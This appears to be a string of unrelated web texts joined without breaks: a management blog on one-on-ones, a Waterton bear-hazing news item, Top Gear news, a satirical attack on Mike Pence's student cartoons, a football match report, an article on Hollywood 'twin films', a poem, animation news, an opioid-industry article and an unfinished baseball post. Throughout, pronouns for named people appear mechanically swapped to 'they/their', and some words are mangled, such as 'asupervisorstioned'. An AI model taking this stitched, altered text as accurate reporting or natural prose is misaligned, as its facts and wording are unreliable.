The reason the why is important is because it can vary widely across individuals – maybe someone on your team cares deeply about democratizing the web , so issues like accessibility and internationalization are what drive their desire to provide support . Maybe someone else on your team actually wants to step into a front end development role , and support is a great first way to understand a product deeply .
While both of these individuals are doing the same tasks day to day , your understanding of their deeper why allows you to better help them find ways to leverage that work toward their personal goals . Helping the first person become a Github guru might miss the mark ; similarly , the second individual would be confused if you invited them to attend a translation summit conference .
It 's not always that easy – not everyone has grand career aspirations , or at least not ones that they have a great way of sharing with their team lead . Not everyone is motivated or compelled by work . Not everyone has an ambition beyond where they are today – that 's OK !
As a lead it is on you to know who is who , and to know on some level what drives them , or that they are not driven to pursue greater things at work – at least not today . That 's the real trick of it , is that just because someone is leaning out of work this week does not mean they wo n't become someone with different goals in two , three months .
It 's a lot to keep track of , and if you allocate 30 minutes to your 30 minute one on one sessions , you 're missing out on a lot of value you could be offering your team members .
I like to do half hour one on ones weekly with my team . I would love to do video every time , but I am willing to settle for voice , and will do text from time to time ( reluctantly ) . I spend about thirty minutes that day also preparing for each one on one session .
That 's not thirty minutes total . I spend as long preparing for the one on one as I do having the one on one . If I have four 30 minute one on ones , that takes me about four hours .
( You can read about how my approach to one on ones has changed over time here : Experimenting with One on Ones : Tales of a Team Lead )
I am a compulsive calendar junkie : if something is n't on my calendar it generally does not get done . Here 's a visual :
( Thursday is so empty because this Thursday through Sunday the Doc and I are having a lovely long weekend bonding with Mango . )
The natural next question is , what do I do with these 30 minutes ?
I am very lucky in that at Automattic , we have a real culture of transparency , and default to over communicating rather than the opposite . I am working on having a better 30 minute structure , but right now , I do this :
Check the team member 's last Weekly Update , which is a structured post we do on Mondays . Follow those trails a bit – look into projects and work they mentioned .
Check their trac and Github contributions over the last week
Scroll through their P2 ( our internal communication tool ) activity , to see where they 're having an impact and hopefully catch them doing something right .
Review our shared , running notes from our one on one sessions
Consider how I can help move them toward their goals , what advice or direction I can offer . Look for roadblocks .
If there 's time : look through their last 3-2-1-Oh document
In a non-remote environment , it might be trickier , and it might take even more time , since you would n't have the advantage of being one click away from these various records . You 'd have to check in with folks on other teams , go back through emails , etc etc .
( You can read about why I do n't use one on ones for status updates here : Iterating on One on Ones )
At the end of the preparation time , I aim to have :
A handle on how their week looks from my end
Suggestions on how to move toward their goals over the next week
Questions for feedback ( in both ways , “ How did your rotation with Terms of Service go ? ” but also , “ How do you think I handled that situation ? ” )
If I were to dedicate only the time during my day for the one on one itself , it would be very difficult for me to really serve my team in the best way that I can . Not to say it would be impossible – but you 'd need a much better memory than me , at least 🙂
If you lead a team , for the next week or two weeks , try spending more time really focused on preparing for those conversations , and coming to the table not with canned Applebee 's interview questions ( “ What would you say you 're struggling with ? ” ) but with insights into their actual work , and how you can help make that work easier , better , or just more fun .
Campers and residents of Waterton were treated to a rare sight Monday , after a young black bear was chased from the town by an RCMP officer clad in their red serge .
Damian Gillis said they and their family were relaxing in their campsite at the Townsite Campground at about 5 p.m. when they heard a commotion and passersby talking about a bear in town . When they followed the group of people gathering on the street , they saw the beginnings of an exciting bear chase .
“ There was quite a commotion with the Parks [ Canada ] officials and the RCMP there and they had a bear up a tree in behind one of the houses , ” Gillis told Global News .
They said there were about four Parks Canada officials as well as the RCMP officer , who was dressed in their traditional red serge — making the moment even more memorable . They were trying to haze the bear out of town .
READ MORE : Quick-thinking drivers save cyclist from possible bear attack on B.C . highway
Gillis said they ran back to get their camera , knowing they had to capture the moment the bear came out of the tree .
“ You never see a police officer in red serge with a black bear in the background , ” they said .
“ Sort of the old image of the police officer going through the wilderness in their red serge uniform and there 's a wild bear in the background . ”
WATCH : A camper at the Waterton Townsite campground captured video of a young black bear being chased from town by an RCMP officer clad in their red serge . Quinn Campbell reports
The RCMP officer involved in the chase said there were hundreds of spectators crowded around as they and the Parks Canada staff tried to direct the bear out of town . They agree the red uniform added to the allure .
READ MORE : ‘ Incredibly beautiful ' white-phase black bear caught on camera in Kananaskis Country
“ A lot of tourists , ” Sgt . Clayton Wilbern said . “ They were getting very excited , they were like , ‘ Oh wow , I came to Waterton to see a Mountie and a bear and I 've got both ! ' ”
“ This was the closest I 've ever been , and this was just a baby bear , so it was pretty cool . ”
Hazing bears a teaching technique
Hazing bears is a way of teaching bears they ca n't come into towns , according to Parks Canada official Dennis Madsen . They said staff will use several techniques like making loud noises , clapping hands , using noisemakers and chalkball guns to shoo them .
READ MORE : Bear safety tips – what to do if you spot a bear
“ If you put a lot of pressure on a bear it 'll just run up in a tree and hide and feel safe up there and then it wo n't go anywhere , ” Madsen said .
“ When a bear comes down from a tree and moves , they move quickly so you have to keep up with the bear and that 's what [ the Mountie ] is doing in the video . ”
The young bear was likely recently weaned from its mother , Madsen said , and has been spotted around the town a few times this year .
Madsen said it 's common to see Mounties in Waterton dressed in their red serge chatting with visitors — but they admitted it 's very rare to see one chasing a bear through town .
READ MORE : Nova Scotia advises how to avoid black bears showing up on properties
Gillis said Waterton Lakes National Park is their family 's favourite park and this is n't the family 's first encounter with a bear in the area . Last year , their 13-year-old daughter came face-to-face with a black bear on a hiking trail near the campground .
Parks Canada is using the Mountie bear chase to remind people to keep their distance from wildlife while in national parks and to avoid feeding any wild animals that may be looking for an easy bite to eat .
With six presenters , it 's safe to assume the Top Gear format will be changing a little bit . When Jeremy Clarkson , James May and Richard Hammond ran the show , they would often appear individually in pre-recorded segments before coming back together for the studio bits and larger `` challenge '' documentaries . A larger crop of faces should give the show better variety , and spread the risk associated with each new presenter . However , it 'll also mean giving them all less screen time .
Coincidentally , Jeremy Clarkson tweeted yesterday that their new motoring show for Amazon Prime begins filming today . The new-look Top Gear is already in production , so there 's a good chance both programmes will run at roughly the same time . If that happens , it should be an intriguing head-to-head -- for many Top Gear fans , Clarkson and company were the core of the show , and that 's reason alone to check out their new series . The BBC has a bigger reach than Amazon Prime though , especially in the UK , and the Top Gear brand is sure to pull in some curious viewers this May .
Before their P was penetrated by Donald 's T , before thousands of women called them to chat about their menses , even before they lost Indiana more than $ 60 million by signing one of the most homophobic laws ever , Mike Pence was a cartoonist .
Their drawings , which starred the vice president-elect 's alter ego , Law School Daze , were published in Indiana University 's Robert H. McKinney School of Law newspaper in the mid eighties .
And though they contain few words , these once-forgotten doodles say a lot about the kind of student Pence was and the kind of politician they would become .
The annoying kind .
Here 's Daze being a buzzkill about criminal law :
IUPUI University Library Special Collections and Archives/Mike Pence
And here they are lying about their desperate need for approval :
IUPUI University Library Special Collections and Archives/Mike Pence
In this one , we see why Pence might find their current running mate comforting :
IUPUI University Library Special Collections and Archives/Mike Pence
And here , Daze makes a magazine with a pun for a title . Similarly , Pence tried to use taxpayers ' money to fund a news outlet called `` Just IN , '' which was going to be written by the government about the government .
IUPUI University Library Special Collections and Archives/Mike Pence
Daze could dish out sick burns , just like Pence , who called out the Patriots by posting a picture of a deflated football . Got 'em !
IUPUI University Library Special Collections and Archives/Mike Pence
Daze did n't really know how to live it up on vacation . Likewise , Pence eats at Chili 's when they come to New York .
IUPUI University Library Special Collections and Archives/Mike Pence
Both Pence and Daze are lousy sharers . Daze with medical students , Pence with Syrian refugees . And Mexicans . Really anyone who does n't speak English . Do n't they have anyplace else to go ?
IUPUI University Library Special Collections and Archives/Mike Pence
Eventually , Daze upgraded their logo so it was n't embarrassing anymore . Sound familiar ?
IUPUI University Library Special Collections and Archives/Mike Pence
And the most glaring similarity between Pence and Daze is their difficulty grasping this whole `` legal system '' thing . ( See : abortion , Syrian refugees . )
IUPUI University Library Special Collections and Archives/Mike Pence
IUPUI University Library Special Collections and Archives/Mike Pence
Sure , we all did embarrassing things in college . Some of us drank too much , some had regrettable one-night stands , some belonged to actual fraternities .
Mike Pence drew unfunny comic strips .
And while most of us deserve to have these minor social missteps erased from society 's collective memory ( we were finding ourselves ! ) , most of us have not given the remaining shreds of our integrity to Donald Trump in exchange for a shot at the vice presidency .
So , Internet , meet Daze . Daze , meet the Internet .
MANCHESTER , England -- Three points from Manchester United 1-2 Norwich , with doubts over Louis van Gaal 's future increasing following a desperate defeat .
Manchester United Norwich City 1 2 FT Game Details GameCast
Lineups and Stats
1 . Van Gaal on the brink ?
The Mancunian rain began to get heavier than Manchester United came out for the second half against Norwich City . Already a goal down after Cameron Jerome 's first-half strike , a vital 45 minutes of football would follow .
Defeat was unimaginable for team who 'd lost their two previous matches , not won in five , been eliminated from the Champions League and whose manager Louis van Gaal was under intense pressure .
It was a filthy afternoon with dark , brooding skies when Norwich scored a match-winning second goal after 54 minutes . As the 1,400 away fans celebrated , supporters in Old Trafford 's giant stands recovered their step . From Stretford End to J Stand , they were loud , proud and sang songs about `` the football taught by Matt Busby . ''
They roared the 59th-minute substitution of a newly shaven-headed Ander Herrera for Marouane Fellaini and sang songs about winning at home and winning away , yet United have stopped doing just that .
The team went into December , a crucial month , needing to show their quality . They 've lost three and drawn one of their matches so far , not the form expected on any Manchester United team , especially one as expensively assembled Van Gaal 's charges .
The pressure already was crushing around Van Gaal and they said in the prematch news conference that they did n't want to lose their final job by getting the sack . Speculation will only increase after another defeat .
United fans inside Old Trafford still supported them until Norwich took the lead . Their rousing second-half efforts helped too . Anthony Martial scored a 66th-minute goal as they reduced the deficit to one , which led to more cries of `` attack . '' One team heeded them and they wore green and yellow .
The last time United failed to win in six matches , they won the treble in 1998-99 . United will do well to win anything this season . Van Gaal will do well to keep their job .
Cameron Jerome struck the opener for Norwich , while Alex Tettey added another in the second half .
2 . Rooney fails to score on landmark appearance
Sir Bobby Charlton presented Wayne Rooney with a silver salver on the pitch before their 500th United appearance .
United 's captain already has played more games than club legends Roy Keane , Bryan Robson , George Best , Rio Ferdinand , Paddy Crerand and Mark Hughes . History will remember them well , a club legend who won the lot , but their form has dipped this season and fans are worried that he 'll never recover the form of old . In mitigation , he 's playing in a system that does n't score enough .
Back after a three-game absence , Rooney was one of four changes to the United side that lost 2-1 at Bournemouth a week ago . Ashley Young , underused by Van Gaal , also started while Chris Smalling , United 's best player this season , was back at the back .
Rooney began in a central attacking role with Martial to their left and Memphis Depay to their right .
The Liverpudlian thought he 'd scored their first goal since October when they stabbed in an early effort as their team started brightly , but it was offside . They also stroked a 23rd-minute shot wide after combining well with Juan Mata , and Smalling headed wide a minute later . He 'd miss an even better chance in time added on .
Rooney chipped a neat 27th-minute ball towards Depay after Michael Carrick had won possession but for United 's pretty buildup , the team was still toothless in attack . They do n't score enough goals . They did manage one against Norwich -- the problem was they were 2-0 down at the time at Old Trafford .
Technically , Rooney will get an assist for Martial 's strike , but the ball flicked off their head .
United fans began to leave five minutes before time , prompting cries of `` Is there a fire drill ? ''
As they chased an equaliser , Rooney over-hit a ball towards their own area . It was a microcosm of another shocking defeat for United .
Wayne Rooney failed to score on their 500th appearance for United as their poor form continued .
3 . Jerome sparks City
Old Trafford has seen fewer Premier League goals than any other top-flight stadium this season , but Norwich did their best to change that as they became the first team to score more than a goal in the league there .
The chance of a sixth 0-0 in 11 games at England 's biggest club stadium disappeared when Norwich , who had slipped into the relegation zone with one win in their previous 11 matches and taken five points from 27 , took a 38th-minute lead through Jerome after they avoided a challenge from Young and held off Carrick to calmly score .
United have kept more clean sheets than any other team and Liverpool 's Christian Benteke was the only other player to score against in the league at Old Trafford this season , where United boasts the meanest home defence in 21 years .
The goal stunned Old Trafford . Until that point , United had dominated and showed more attacking intent than in previous matches , yet Norwich goalkeeper Declan Rudd still had little to do . United had scored 13 without reply in their past four matches against Norwich , but while the Canaries ' form has dipped , so has United 's .
Former captain Roy Keane sat in the directors ' box . Not without foundation , they have been a critic of Van Gaal 's side . They had more ammunition on another depressing afternoon in M16 .
Jerome scored nearly 20 goals last season for Norwich as they were promoted from the Championship , but they have found goals far harder to come by in the Premier League . Jerome , who first played at Old Trafford a decade ago , can feel proud of their contribution . They combined superbly with goal scorer Tettey , moving up field towards Norwich 's second goal after 54 minutes . As their fans delighted with chants of their classic `` On the ball City , '' Norwich threatened again .
In the 82nd minute , Youssouf Mulumbu shot and Jonny Howson had a chance with the follow up . Norwich were far from under pressure and substitute Howson screamed at the referee for a penalty as their leg appeared to be clipped by Daley Blind . It did n't matter for they still enjoyed an improbable but fully deserved victory .
Andy Mitten is a freelance writer and the founder and editor of United We Stand . Follow them on Twitter : @ AndyMitten .
Yachna N. asks : Why do movie studios release near identical movies at the same time ?
“ Twin films ” is the term used to describe a peculiar Hollywood phenomenon that just about every year sees different major studios releasing movies with almost identical plots and themes to their competitors current offerings . Popular examples of twin films include Deep Impact and Armageddon , two films released within weeks of one another that centred around saving the world from a giant meteor . Other popular examples include A Bug 's Life and Antz – animated films about ants rebelling against their hive . Then there 's Dante 's Inferno and Volcano – both of which are disaster films about volcanic eruptions . ( As an idea of how common this is in Hollywood , all of these films were released between 1997 and 1998 . )
Or how about Chasing Liberty and First Daughter , two romantic comedies released in 2004 centered around the idea of the romantic escapades of the President 's rebellious teenage daughter . Sticking with the White House , we have the March 22 , 2013 release of Olympus Has Fallen followed by the shockingly similar June 8 , 2013 film White House Down , which , to be fair , are both mostly just “ Die Hard in the White House ” .
While it 's tempting to think this is something of a modern phenomenon deriving from the popular meme that Hollywood has run out of ideas , in truth , twin films are as old as the film industry itself . So how do these come about ?
It turns out there are a variety of things that may result in a twin film , with everything from corporate espionage to pure coincidence coming into play . For example , one of the most famous films of all time , Gone With the Wind , is also one of the most noteworthy twin films in history . In this case , famed actor Bette Davis failed to secure the role of Scarlett O'Hara in MGM 's Gone With the Wind . Looking to make their own Civil War film , Warner Brothers snapped up the rights to a Broadway play called Jezebel , which , like Gone With the Wind , was all about a fiercely independent southern woman during the Civil War . They then cast Davis in the title role and slapped together a film as quickly as possible in order to get it out before Gone With the Wind .
They were successful in this endeavor , with the film being a hit and Davis even winning an Oscar for their role in the movie . However , while Jezebel was well received , it was soon eclipsed by its twin film , Gone With the Wind , which would set a record for the most Academy Awards and nominations , sell around 25 million tickets from 1939-1940 , and then be re-issued in 1941 and 1942 bringing the total up to just shy of an astounding 60 million tickets sold . This made it the highest grossing film ever made up to that point . In fact , it is still generally considered such after adjusting for inflation .
( To be fair to recent films like Avatar that have come close to the mark when adjusting for inflation , Gone With the Wind has been re-released many times over the years continuing to pad the numbers ; without those re-releases , it would no longer hold the top spot ; so it 's possible many decades from now a few of those other films might surpass it if they ultimately show some semblance of staying power . Although , I do n't think anyone 's holding their breath about the current # 6 , Furious 7 , benefiting from a flurry of re-releases over the coming decades… )
In any event , other twin films alleged to have surfaced as a result of intentional corporate shenanigans include the asupervisorstioned Deep Impact and Armageddon , largely because the latter film mysteriously went into production just weeks after Deep Impact was announced . A lawsuit was threatened as a result , but ultimately nothing ever came of it .
Likewise , it 's long been rumored that the idea for the Dreamworks film Antz was stolen from Disney by Jeffrey Katzenberg , the then CEO of the studio . Prior to working for Dreamworks , Katzenberg had worked for Disney and it 's alleged that when they jumped ship , they took an idea Disney had been working on about an animated film about a non-conformist ant and made it their own . Again , nothing ever came of the allegations and it 's still not clear which studio had the idea first .
Another reason for twins films coming to be is just timing of some event or the like . For example , this is the proposed explanation for why Hollywood decided to release two competing movies chronicling the life of Christopher Columbus in 1992 . These movies , 1492 : Conquest of Paradise and Christopher Columbus : The Discovery were both advertised as celebrating the 500th anniversary of the “ discovery ” of America . ( See : The Truth About Christopher Columbus )
Twin films can also arise as a result of studios wanting to cover or delve into the same currently en vogue topic at the time , but not necessarily having been inspired by the knowledge that another studio was working on something similar . ( With the number of people working on movies , studios pretty much always know what other studios are developing at any given moment , whether they widely announce a project or not . ) Notable examples of this are the films The Truman Show and EDtv released in 1998 and 1999 respectively . Both of these were made , as the British Film Institute puts it , as a direct result of an attempt to : “ tap into the fascination with the then-nascent reality television ” .
Then you have studios simply noticing that a particular genre of film is popular at a given time and attempting to cash in on the trend . A great example is the year 1979 during which five different Dracula movies were released , the most notable being Nosferatu the Vampyre and Dracula- both of which were n't just simple retellings of Bram Stoker 's original Gothic masterpiece , but adaptations of previous adaptations of their work .
So the next time someone complains about the supposedly “ new ” notion of Hollywood running out of ideas based on recent offerings seeming to be a slurry of remakes , just remind them that at the end of the 1970s , studios released five Dracula movies in quick succession , two of which were remakes of existing Dracula movies .
Remakes upon remakes has always been the order of the day going all the way back to silent films , which were often just remakes of stage-shows , books , other silent films , etc . A noteworthy early example of this is the 1939 Wizard of Oz staring Judy Garland . While you might be aware that it is based on a book , The Wonderful Wizard of Oz , published in 1900 , you probably are n't aware that , beyond previous Broadway musical adaptations , the 1939 Wizard of Oz was something of a remake of the 1925 film The Wizard of Oz . Yes , it took Hollywood just 14 years to decide that modifying the story a bit and adding a dash of new technology made The Wizard of Oz again a great idea . Originality has never been the name of the game in Hollywood- adapting existing works of various sorts has always been more of the rule than the exception . Modern cinema is no different in this respect .
Now , as you 'd expect for an industry where ego and self-aggrandizement are celebrated , even when studios learn that a rival is planning to release a movie with an almost identical premise , they seldom back down to divert resources into more unique offerings , which is a key reason so many of these films are released so close to one another .
A notable exception is the 1974 film The Towering Inferno . The movie originally began life as two different projects optioned by Warner Bros and Twentieth Century Fox respectively following the success of disaster movie , The Poseidon Adventure . After being outbid by Warner Bros for the rights to a novel about a burning skyscraper called The Tower , Fox attempted to steal their thunder by purchasing the rights to a book with an almost identical premise called The Glass Inferno .
Both studios were set to make their own version of the film , each starring big named actors , with Warner Bros pegging Paul Newman for the lead and Fox doing the same with Steve McQueen . However , before production began , producer Irwin Allen convinced executives from both studios that there was no scenario in which either studio would win if they decided to compete with one another at the box office . Instead , they proposed that they combine resources to make a single , super film about a giant flaming building . Not only would ceasing to compete on this one help revenue while reducing overall cost for each studio , but they could even have both Newman and McQueen starring in it .
The two studios agreed and terms were quickly drawn up , with the historic union being formally announced in a press release in October of 1973 that read :
It 's as though General Motors and Chrysler combined their respective brainpower and manpower and went Dutch treat on the bill to produce a new model automobile .
As for the film 's title , an agreement was reached to combine the titles of the two novels that served as inspiration for the film- so , The Tower and The Glass Inferno became The Towering Inferno…
In the end , the film was a massive hit , grossing approximately ten times its production budget and was nominated for eight Academy Awards , of which it won three .
Of course , although twin films are still just as popular today as they were decades ago- seeing as in 2017 alone we 've had competing biopics about both Winston Churchill ( Churchill and Darkest Hour ) and Tommy Wiseau ( The Disaster Artist and Best F ( r ) iends ) - the current “ in thing ” in Hollywood appears to be aping the idea of shared cinematic universes , in a not so-subtle attempt to emulate the success of Marvel .
( But seemingly always choosing , unlike Marvel , to make cinematic universes darker and darker than their stamp on their blow-em-up world ending sagas , rather than Marvel 's choice of keeping things generally light-hearted , even in their films ' darkest moments- essentially never taking themselves and their brand of world-ending plots too seriously . )
Examples of films launched recently that were intended to be a jumping off point for a shared cinematic universe include King Arthur : Legend of the Sword ( 2017 ) and The Mummy ( 2017 ) , both of which failed to meet box office expectations and resulted in plans for additional films to be shelved . ( A temporary setback ; they 'll surely try again and again . )
Meanwhile , a few years ago Hollywood was all about adapting books aimed at young adults into potential epic series , examples including Divergent , The Maze Runner , Eragon , The Vampire 's Assistant , Vampire Academy , A Series of Unfortunate Events , and the Percy Jackson films- all of which were an attempt to emulate the success of similar offerings like Harry Potter , The Twilight Saga , and The Hunger Games films .
Looking to the future , it appears that twin films are very much going to remain a part of the cinematic landscape with , for instance , there being at least half a dozen Robin Hood films in development right now , including one that 's supposed to be the launch pad for a new shared cinematic universe…
Just for fun , we can only hope that studio execs take a leaf out of Warner Bros and Fox 's 1974 playbook and decide to combine their resources to make a single , giant Robin Hood movie starring every major actor in Hollywood- a feat Marvel seems to be presently striving for anyway in their own little universe , which… * lightbulb * Robin Hood as the backstory for Marvel 's Hawkeye in a first step to bring all cinematic universes from every film ever made into one single megaverse . Just saying , I 'd pay to see Inigo Montoya as a member of the Avengers .
If you liked this article , you might also enjoy our new popular podcast , The BrainFood Show ( iTunes , Spotify , Google Play Music , Feed ) , as well as :
Bonus Facts :
Die Hard was actually technically an adaptation of a book Nothing Lasts Forever , which in turn was a sequel to a book called The Detective , which was made into a 1968 film of the same name starring Frank Sinatra . For this reason , Sinatra contractually had to be offered the role of John McClane in Die Hard , even though they were 73 years old when the film was made . Naturally given their age , Sinatra turned down the role . Although , Bruce Willis is now in their 60s and showing no signs of slowing down on the action star front , so maybe we 'll yet get a Die Hard film with a 73 year old star .
Steve McQueen and Paul Newman were reportedly not happy about the merged films , and particularly were concerned with who would be given top billing for The Towering Inferno , which resulted in the poster for the film looking like a hot mess . You see , to satisfy the ego of both men their names were written diagonally across the top of the poster , with McQueen 's name being further to the left but Newman 's being slightly higher . This was done so that each man technically had top billing depending on whether you read the names left to right , or top to bottom . To prevent further arguments , McQueen and Newman received exactly the same pay for appearing in the movie . According to a persistent and possibly apocryphal rumor , McQueen went as far to order rewrites for their character so that they and Newman would have the same amount of screen time and number of spoken lines .
Yet another blatant example of twin films was two competing biopics of the starlet Jean Harlow released in 1965 made by Paramount Pictures and Magna . Both films were in cinemas at the same time , with Magna 's take on the source material being released five weeks earlier . The kicker ? Both films were called Harlow .
One of the more amusing sets of twin films is The Legend of the Titanic and Titanic : The Legend Goes On , which were two animated films released within a few months of each other in 1999 and 2000 respectively , retelling the story of the sinking of the Titanic , both by Italian studios , and both of which inexplicably starred talking anthropomorphic mice…
Expand for References
for Patricia Anderson
“ To do as Adam did ”
through the twilight 's fluoride glare Mercury in perihelion
( rotating exactly three times
while circling the sun twice )
to Pluto foot tilt up the slide at either plane
and build a Garden of the brain .
Internetted eternities , interspersed
with cypresses
ply ringed air about the many spectacled apples there .
Flamestitch niches orb in swivel orb , The Muses thrush at center
turning . Phospheros arborescens they sing
sense 's
struck crystal clarities
to knock the knees
( or scarlet hollyhock , against a near blue sky ) .
No end of fountains lost among the shrubberies full eye may bare .
Fixed stars
with fireflies jam the lilac .
The Lord is a delicate hammerer .
Gold hive upon gray matter
They tap synapse ( “ carrying to ” ) ( “ carrying away ” )
an immense bronze pinecone moon-knit at the end of a vista
of sunny jets d'eau , silver poplars . All
shivered in a pool .
Literally , a flowing : form-take-hand
-with-form
( That Which Fasteneth Us )
pillar to pillar the great dance arch itself through all that
is or was or will be , 3/4 time . This will be a glade
at the head of one stream
and a resonant gnomon before it will stretch regions of signaling
gnat-like resiliencies in the atmosphere
of where we are —
or were .
Or will be , when the mingled frame of mind
of man is celebration .
Gates , which separate the wings
of tiered ilex , open
in caverns of atoms passing from one into another 's zenith
of periodic movement , vast helicoidal shift :
a vaulting of arteries
beating their heads against the dark .
This is the body of light .
Vertically in a chromatic spread chord
— Elysian elision —
J'avais bâti , dans un rêve , un palais , un château ou des
grottes
along the lines of sight .
Dear Garden :
This is the way the world begins , the word begins .
Through here ,
where grow the galax and aster together ,
I have planted Shadow illuminating The Field of Glittering
Opposites :
ange arc-en-ciel
flocons de neige
I have attempted a temple as if hierarchies of music
beating against time gone adagio , that is the Secret Pool we return
to . And not to stone
but to the world behind its human
mirror .
This is the way the word begins , the world begins ,
wrestling the old ineffable to Bosch 's amazing white giraffe
— or St. Rousseau
intent a symmetry of whisker .
Love itself is a kind of mirage nesting it all
together . Around a center
no one can see the end of at the Well of The Bottomless ,
I have placed parallels of bright guardians
“ along with the trill
of the Nightingale ,
and the call of the European quail ”
as in The Pastoral .
( Signed ) THE GARDENER
P.S .
“ I have refracted it with Prismes , and reflected with it Bodies which in Day-
light were of other colours ; I have intercepted it with the coloured film of Air
interceding two compressed plates of glass ; transmitted it through coloured
Mediums , and through Mediums irradiated with other sorts of Rays , and
diversly terminated it ; and yet could never produce any new colour out of it .
But the most surprising , and wonderful composition was that
of Whiteness . ”
Last weekend at the CTN Animation Expo , Lauren Faust revealed publicly that they were no longer working at Sony Pictures Animation on the feature film project Medusa .
Announced in summer 2014 , Medusa was to have been the theatrical directorial debut of Faust , a 20-year industry veteran who gained widespread acclaim for their 2010 reboot of the Little Pony franchise .
“ I very much enjoyed my time at Sony Pictures Animation and was extremely excited about the progress our amazing team was making on Medusa , ” Faust told Cartoon Brew today . “ But , as it happens at so many studios with so many projects , we ultimately ran into creative differences on the direction of the project . I do not know if Medusa has been shelved , but I am no longer working on it or at Sony . ”
BETWEEN 1999 and 2014 sales of prescription opioid drugs almost quadrupled in America , an increase that came not simply in response to patient suffering but because more of the population are addicted to these powerful drugs . Such is the demand for them , Americans now consume four-fifths of the global supply .
Growth on this scale has been profitable for some : OxyContin , a popular opioid made by Purdue Pharma , a drug company in Stamford , Connecticut , has made its manufacturer tens of billions of dollars ( see chart ) . But more broadly it has spelled tragedy . Deaths from opioid use in America quadrupled over the same period . About 90 people die every day , according to the Centres for Disease Control and Prevention .
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor 's Picks .
That dissonance between corporate success and private pain has become a matter of public interest . On March 28th Senator Claire McCaskill , a Democrat from Missouri , said that they would investigate the role that pharma firms played in creating the opioid crisis . Through a committee that oversees issues of homeland security and government affairs , they have written to five makers of prescription painkillers—Purdue Pharma , Depomed , Janssen/Johnson & Johnson , Insys Therapeutics and Mylan . They are demanding internal corporate documents stretching back over five years .
Ms McCaskill wants to know exactly how firms marketed their drugs and what they knew about the risks of addiction and abuse . In particular , they want to find out if companies used calculated sales-and-marketing strategies that involved encouraging doctors to prescribe opioids for a wider category of causes of pain than they would otherwise have done and downplaying the risk of addiction .
This is not the first time such questions have been raised . In a case in 2007 , the parent company of Purdue Pharma and three current and former executives there pleaded guilty to criminal charges that they misled regulators , doctors and patients about OxyContin 's risk of addiction and potential for abuse . Purdue promoted the drug , which is long-acting , as posing a lower risk of abuse and addiction than shorter-acting painkillers—such as Percocet and Vicodin . The firm admitted it had made statements about its drug that were “ inconsistent ” with approved prescribing information . In other words , the firm had incorrectly told doctors that OxyContin was less prone to abuse than other opioid medicines . The firm agreed to pay $ 600m and the three executives paid $ 34.5m in fines .
Ms McCaskill 's inquiry is not the only one drug firms face . The Department of Justice ( DoJ ) has alleged that kickbacks were offered to encourage drug prescriptions and also that , as a result , health insurers were defrauded . In December the DoJ arrested former senior staff at Insys Therapeutics on charges that they led a conspiracy to bribe doctors to unnecessarily prescribe patients a pain medication based on fentanyl ( an opioid that is up to 50 times as powerful as heroin ) , defrauding the insurers who had to cover the drug 's cost . The Drug Enforcement Administration has also taken action against firms for failing to control the “ diversion ” of prescription drugs to illicit uses . Earlier this year McKesson , a San Francisco-based pharma distributor , agreed to pay $ 150m for failing to report suspiciously large orders of drugs .
Increasingly , too , counties and cities are filing lawsuits against manufacturers for their role in the opioid epidemic . There may be further legal action against the firms that distribute opioid medicines , acting as intermediaries between pharma firms and pharmacies . Some have been named in lawsuits .
Nora Volkow , director of the National Institute on Drug Abuse , says that pharma companies are not the only ones to blame for the opioid crisis . They point to well-meaning efforts to implement procedures to make sure that pain was not under-treated in hospitals . Direct-to-consumer advertising of opioids may also have encouraged overuse . Only America and New Zealand allow pharma firms to advertise drugs directly to patients .
The scrutiny on the industry is nonetheless intensifying . The number of opioid prescriptions being given is no longer rising , and may be falling . The same can not be said for drugs firms ' legal woes .
Besides pitchers , infielders tend to have the strongest arms on the diamond . If we look at the last position player to pitch for each team , it breaks down like this .
The reason it adds up to 28 is because Josh Wilson , journeyman extraordinaire , was the last position player to pitch for the Diamondbacks , the Padres , and the Tigers . Considering Wilson has only managed to accumulate 0.3 WAR over eight seasons coming off the bench , they might be better off transitioning into the bullpen .
There 's no denying that infielders have to possess great arm strength to throw out speedy runners , but I think there 's another factor at play here . An overwhelming proportion of those 18 infielders were the kind of utility players that every team has to have on its bench . Guys like John McDonald , Steve Tolleson , Daniel Descalso , Jamey Carroll—guys who can comfortably defend multiple positions in an emergency . While some of them might indeed have live arms , the real reason they 're pitching so often is because they 're relatively expendable . A manager is n't going to risk the arm of their backup catcher or a resting starter when their team is down big late in a game , which is usually the situation that forces a position player to take the mound .
One interesting case of a utility/bench guy who does indeed have a live arm is Cliff Pennington , who became the first position player in history to pitch in the postseason last year with the Blue Jays .
It almost looks like they got a few pointers from Marcus Stroman .
OK , I 've talked myself in a circle and now I 'm not sure at all which position players have the best arms , so I 'll ask you guys .
But enough about that , because this post is about the arms of outfielders , and the throws they make . In particular , the throws they make that remain airborne from hand to glove—release to catch . Obviously it makes sense to bounce a throw in some situations , but in my mind the throw “ on the fly ” is the most aesthetically pleasing kind of throw an outfielder can make . It 's a frictionless display of power that taps into the basic joy of seeing just how far you can whip a ball .
Throws on the fly break down into two main types : the rainbow and the frozen rope . We 'll see great examples of both and of course ample GIFs , so without further ado , welcome to Week 2 of Who Did It Best ?
4 . Yoenis Cespedes throws out Howie Kendrick at home plate
Estimated distance : 320 ft .
This throw electrified the league for a good week . If you did n't know who Yoenis Cespedes was before June 11 , 2014 , you knew who they were after this play . The Cuban defector was already known for their nonchalant attitude in left field , and the announcers do n't even comment on the careless bobble that allowed this play to unfold . If you look at their legs in this picture , Cespedes is already in a throwing position despite not even having the ball in their glove :
After realizing their mistake , they jog over gingerly ( maybe the right word is saunter ) , slowing to take a quick look at Kendrick rounding third…
Before unleashing an arcing rainbowbomb on the fly .
There are two things that make this a legendary throw . The first is that Cespedes releases the ball flat-footed without any crow hops , which is probably what caused the high arc as they are n't able to get on top of it . The second is how the ball looks like it could sail straight into the seats but instead is almost magnetically attracted to home plate and decides to drop out of the air just in time .
3 . Rick Ankiel freezes Jordan Schafer at third
Ankiel is the only guy on this list who actually was a pitcher . After coming second ( to Rafael Furcal ) in Rookie of the Year voting in 1999 , Ankiel infamously lost their ability to throw strikes from the mound in the 2000 postseason . After a seven year hiatus , Ankiel worked their way back to the Majors as an outfielder , and on April 16 , 2012 , they did this :
Estimated distance : 350 ft .
